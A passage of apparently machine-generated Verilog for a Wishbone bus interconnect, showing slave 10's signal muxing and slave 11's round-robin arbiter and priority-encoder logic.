    always @ (  ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd10 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd10 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd10 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd10 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd10 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd10 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd10 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd10 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s10_wb_stb_o = ( ( ( m0_slv_sel == 4'd10 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s10_wb_stb_o = ( ( ( m1_slv_sel == 4'd10 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s10_wb_stb_o = ( ( ( m2_slv_sel == 4'd10 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s10_wb_stb_o = ( ( ( m3_slv_sel == 4'd10 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s10_wb_stb_o = ( ( ( m4_slv_sel == 4'd10 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s10_wb_stb_o = ( ( ( m5_slv_sel == 4'd10 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s10_wb_stb_o = ( ( ( m6_slv_sel == 4'd10 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s10_wb_stb_o = ( ( ( m7_slv_sel == 4'd10 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s10_m0_ack_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s10_ack_i );
    assign s10_m1_ack_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s10_ack_i );
    assign s10_m2_ack_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s10_ack_i );
    assign s10_m3_ack_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s10_ack_i );
    assign s10_m4_ack_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s10_ack_i );
    assign s10_m5_ack_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s10_ack_i );
    assign s10_m6_ack_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s10_ack_i );
    assign s10_m7_ack_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s10_ack_i );
    assign s10_m0_err_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s10_err_i );
    assign s10_m1_err_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s10_err_i );
    assign s10_m2_err_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s10_err_i );
    assign s10_m3_err_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s10_err_i );
    assign s10_m4_err_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s10_err_i );
    assign s10_m5_err_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s10_err_i );
    assign s10_m6_err_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s10_err_i );
    assign s10_m7_err_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s10_err_i );
    assign s10_m0_rty_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s10_rty_i );
    assign s10_m1_rty_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s10_rty_i );
    assign s10_m2_rty_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s10_rty_i );
    assign s10_m3_rty_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s10_rty_i );
    assign s10_m4_rty_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s10_rty_i );
    assign s10_m5_rty_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s10_rty_i );
    assign s10_m6_rty_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s10_rty_i );
    assign s10_m7_rty_o = ( ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s10_rty_i );
    assign s11_wb_data_i = s11_data_i;
    assign s11_data_o = s11_wb_data_o;
    assign s11_addr_o = s11_wb_addr_o;
    assign s11_sel_o = s11_wb_sel_o;
    assign s11_we_o = s11_wb_we_o;
    assign s11_cyc_o = s11_wb_cyc_o;
    assign s11_stb_o = s11_wb_stb_o;
    assign s11_wb_ack_i = s11_ack_i;
    assign s11_wb_err_i = s11_err_i;
    assign s11_wb_rty_i = s11_rty_i;
    always @ (  posedge clk_i)
    begin
        s11_next <=  ~( s11_wb_cyc_o);
    end
    assign s11_arb_req = { m7_s11_cyc_o, m6_s11_cyc_o, m5_s11_cyc_o, m4_s11_cyc_o, m3_s11_cyc_o, m2_s11_cyc_o, m1_s11_cyc_o, m0_s11_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s11_arb_state <= s11_arb_grant0;
        end
        else
        begin 
            s11_arb_state <= s11_arb_next_state;
        end
    end
    always @ (  s11_arb_state or  { m7_s11_cyc_o, m6_s11_cyc_o, m5_s11_cyc_o, m4_s11_cyc_o, m3_s11_cyc_o, m2_s11_cyc_o, m1_s11_cyc_o, m0_s11_cyc_o } or  1'b0)
    begin
        s11_arb_next_state = s11_arb_state;
        case ( s11_arb_state ) 
        s11_arb_grant0:
        begin
            if (  !( s11_arb_req[0]) | 1'b0 ) 
            begin
                if ( s11_arb_req[1] ) 
                begin
                    s11_arb_next_state = s11_arb_grant1;
                end
                else
                begin 
                    if ( s11_arb_req[2] ) 
                    begin
                        s11_arb_next_state = s11_arb_grant2;
                    end
                    else
                    begin 
                        if ( s11_arb_req[3] ) 
                        begin
                            s11_arb_next_state = s11_arb_grant3;
                        end
                        else
                        begin 
                            if ( s11_arb_req[4] ) 
                            begin
                                s11_arb_next_state = s11_arb_grant4;
                            end
                            else
                            begin 
                                if ( s11_arb_req[5] ) 
                                begin
                                    s11_arb_next_state = s11_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s11_arb_req[6] ) 
                                    begin
                                        s11_arb_next_state = s11_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s11_arb_req[7] ) 
                                        begin
                                            s11_arb_next_state = s11_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_arb_grant1:
        begin
            if (  !( s11_arb_req[1]) | 1'b0 ) 
            begin
                if ( s11_arb_req[2] ) 
                begin
                    s11_arb_next_state = s11_arb_grant2;
                end
                else
                begin 
                    if ( s11_arb_req[3] ) 
                    begin
                        s11_arb_next_state = s11_arb_grant3;
                    end
                    else
                    begin 
                        if ( s11_arb_req[4] ) 
                        begin
                            s11_arb_next_state = s11_arb_grant4;
                        end
                        else
                        begin 
                            if ( s11_arb_req[5] ) 
                            begin
                                s11_arb_next_state = s11_arb_grant5;
                            end
                            else
                            begin 
                                if ( s11_arb_req[6] ) 
                                begin
                                    s11_arb_next_state = s11_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s11_arb_req[7] ) 
                                    begin
                                        s11_arb_next_state = s11_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s11_arb_req[0] ) 
                                        begin
                                            s11_arb_next_state = s11_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_arb_grant2:
        begin
            if (  !( s11_arb_req[2]) | 1'b0 ) 
            begin
                if ( s11_arb_req[3] ) 
                begin
                    s11_arb_next_state = s11_arb_grant3;
                end
                else
                begin 
                    if ( s11_arb_req[4] ) 
                    begin
                        s11_arb_next_state = s11_arb_grant4;
                    end
                    else
                    begin 
                        if ( s11_arb_req[5] ) 
                        begin
                            s11_arb_next_state = s11_arb_grant5;
                        end
                        else
                        begin 
                            if ( s11_arb_req[6] ) 
                            begin
                                s11_arb_next_state = s11_arb_grant6;
                            end
                            else
                            begin 
                                if ( s11_arb_req[7] ) 
                                begin
                                    s11_arb_next_state = s11_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s11_arb_req[0] ) 
                                    begin
                                        s11_arb_next_state = s11_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s11_arb_req[1] ) 
                                        begin
                                            s11_arb_next_state = s11_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_arb_grant3:
        begin
            if (  !( s11_arb_req[3]) | 1'b0 ) 
            begin
                if ( s11_arb_req[4] ) 
                begin
                    s11_arb_next_state = s11_arb_grant4;
                end
                else
                begin 
                    if ( s11_arb_req[5] ) 
                    begin
                        s11_arb_next_state = s11_arb_grant5;
                    end
                    else
                    begin 
                        if ( s11_arb_req[6] ) 
                        begin
                            s11_arb_next_state = s11_arb_grant6;
                        end
                        else
                        begin 
                            if ( s11_arb_req[7] ) 
                            begin
                                s11_arb_next_state = s11_arb_grant7;
                            end
                            else
                            begin 
                                if ( s11_arb_req[0] ) 
                                begin
                                    s11_arb_next_state = s11_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s11_arb_req[1] ) 
                                    begin
                                        s11_arb_next_state = s11_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s11_arb_req[2] ) 
                                        begin
                                            s11_arb_next_state = s11_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_arb_grant4:
        begin
            if (  !( s11_arb_req[4]) | 1'b0 ) 
            begin
                if ( s11_arb_req[5] ) 
                begin
                    s11_arb_next_state = s11_arb_grant5;
                end
                else
                begin 
                    if ( s11_arb_req[6] ) 
                    begin
                        s11_arb_next_state = s11_arb_grant6;
                    end
                    else
                    begin 
                        if ( s11_arb_req[7] ) 
                        begin
                            s11_arb_next_state = s11_arb_grant7;
                        end
                        else
                        begin 
                            if ( s11_arb_req[0] ) 
                            begin
                                s11_arb_next_state = s11_arb_grant0;
                            end
                            else
                            begin 
                                if ( s11_arb_req[1] ) 
                                begin
                                    s11_arb_next_state = s11_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s11_arb_req[2] ) 
                                    begin
                                        s11_arb_next_state = s11_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s11_arb_req[3] ) 
                                        begin
                                            s11_arb_next_state = s11_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_arb_grant5:
        begin
            if (  !( s11_arb_req[5]) | 1'b0 ) 
            begin
                if ( s11_arb_req[6] ) 
                begin
                    s11_arb_next_state = s11_arb_grant6;
                end
                else
                begin 
                    if ( s11_arb_req[7] ) 
                    begin
                        s11_arb_next_state = s11_arb_grant7;
                    end
                    else
                    begin 
                        if ( s11_arb_req[0] ) 
                        begin
                            s11_arb_next_state = s11_arb_grant0;
                        end
                        else
                        begin 
                            if ( s11_arb_req[1] ) 
                            begin
                                s11_arb_next_state = s11_arb_grant1;
                            end
                            else
                            begin 
                                if ( s11_arb_req[2] ) 
                                begin
                                    s11_arb_next_state = s11_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s11_arb_req[3] ) 
                                    begin
                                        s11_arb_next_state = s11_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s11_arb_req[4] ) 
                                        begin
                                            s11_arb_next_state = s11_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_arb_grant6:
        begin
            if (  !( s11_arb_req[6]) | 1'b0 ) 
            begin
                if ( s11_arb_req[7] ) 
                begin
                    s11_arb_next_state = s11_arb_grant7;
                end
                else
                begin 
                    if ( s11_arb_req[0] ) 
                    begin
                        s11_arb_next_state = s11_arb_grant0;
                    end
                    else
                    begin 
                        if ( s11_arb_req[1] ) 
                        begin
                            s11_arb_next_state = s11_arb_grant1;
                        end
                        else
                        begin 
                            if ( s11_arb_req[2] ) 
                            begin
                                s11_arb_next_state = s11_arb_grant2;
                            end
                            else
                            begin 
                                if ( s11_arb_req[3] ) 
                                begin
                                    s11_arb_next_state = s11_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s11_arb_req[4] ) 
                                    begin
                                        s11_arb_next_state = s11_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s11_arb_req[5] ) 
                                        begin
                                            s11_arb_next_state = s11_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s11_arb_grant7:
        begin
            if (  !( s11_arb_req[7]) | 1'b0 ) 
            begin
                if ( s11_arb_req[0] ) 
                begin
                    s11_arb_next_state = s11_arb_grant0;
                end
                else
                begin 
                    if ( s11_arb_req[1] ) 
                    begin
                        s11_arb_next_state = s11_arb_grant1;
                    end
                    else
                    begin 
                        if ( s11_arb_req[2] ) 
                        begin
                            s11_arb_next_state = s11_arb_grant2;
                        end
                        else
                        begin 
                            if ( s11_arb_req[3] ) 
                            begin
                                s11_arb_next_state = s11_arb_grant3;
                            end
                            else
                            begin 
                                if ( s11_arb_req[4] ) 
                                begin
                                    s11_arb_next_state = s11_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s11_arb_req[5] ) 
                                    begin
                                        s11_arb_next_state = s11_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s11_arb_req[6] ) 
                                        begin
                                            s11_arb_next_state = s11_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s11_msel_req = { m7_s11_cyc_o, m6_s11_cyc_o, m5_s11_cyc_o, m4_s11_cyc_o, m3_s11_cyc_o, m2_s11_cyc_o, m1_s11_cyc_o, m0_s11_cyc_o };
    assign s11_msel_pri_enc_valid = { m7_s11_cyc_o, m6_s11_cyc_o, m5_s11_cyc_o, m4_s11_cyc_o, m3_s11_cyc_o, m2_s11_cyc_o, m1_s11_cyc_o, m0_s11_cyc_o };
    always @ (  s11_msel_pri_enc_valid[0] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[0]) ) 
        begin
            s11_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'h1 ) 
                begin
                    s11_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'h2 ) 
                    begin
                        s11_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s11_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[0] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[0]) ) 
        begin
            s11_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[1] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[0] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s11_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[1] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[1]) ) 
        begin
            s11_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'h1 ) 
                begin
                    s11_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'h2 ) 
                    begin
                        s11_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s11_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[1] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[1]) ) 
        begin
            s11_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[3] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[2] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s11_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[2] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[2]) ) 
        begin
            s11_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'h1 ) 
                begin
                    s11_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'h2 ) 
                    begin
                        s11_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s11_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[2] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[2]) ) 
        begin
            s11_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[5] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[4] ) ) } == 2'h0 ) 
            begin
                s11_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s11_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s11_msel_pri_enc_valid[3] or  { ( ( ( s11_msel_pri_sel == 2'd2 ) ) ? ( rf_conf11[7] ) : ( 1'b0 ) ), ( ( ( s11_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf11[6] ) ) })
    begin
        if (  !( s11_msel_pri_enc_valid[3]) ) 
        begin
            s11_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
        end
        else
        begin 
